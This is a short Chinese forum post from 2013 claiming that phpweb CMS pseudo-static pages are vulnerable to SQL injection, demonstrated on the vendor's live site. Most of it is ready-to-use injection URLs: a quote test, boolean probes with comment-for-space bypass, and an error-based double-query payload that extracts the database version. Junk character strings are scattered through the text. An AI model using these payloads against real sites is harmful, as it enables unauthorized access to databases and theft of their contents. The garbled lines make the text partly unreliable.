phpweb所有的整站程序伪静态页面都存在sql注入
, B2 G! w8 p7 ^# f$ p
3 _* M4 h$ G2 d) I& q6 h* S主站:http://phpweb.net/
- h; w0 _" [7 ^6 i( L1 e7 U加’检测:, B/ g9 b) m& R
+ a: p+ r+ t. i+ Q! s5 I' [
http://www.phpweb.net/down/html/?772′.html3 I+ R9 W1 s7 D B! {
, I$ d2 P, Z% [
出错
- e5 k' L2 d) u2 W+ H, z存在注入。5 m' z/ _! X% E7 U/ r- x
不能用空格,只能用/*罗2 |; b- J8 ]0 [6 D- s
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常( e7 U& h7 Q; d
! @- H8 @7 B! A5 p' f4 l5 ~
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错." i$ a3 l+ E- |" r
爆数据库版本:
1 {9 f" S8 O8 w% ~' F3 _
& r- [$ \5 Q; u" k& V! c1 h3 a?7 S* P" s% {' l1 d' _! m" }
1- @ H, S* o1 ^: Y8 G, b9 G0 K
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html+ I5 X' t1 a+ j4 m9 J" E
更新日期: 2013-01-03 13:39:50
% c4 Z* |% S7 g% @, X |
发表于 2013-1-4 19:46:42
收藏
支持
反对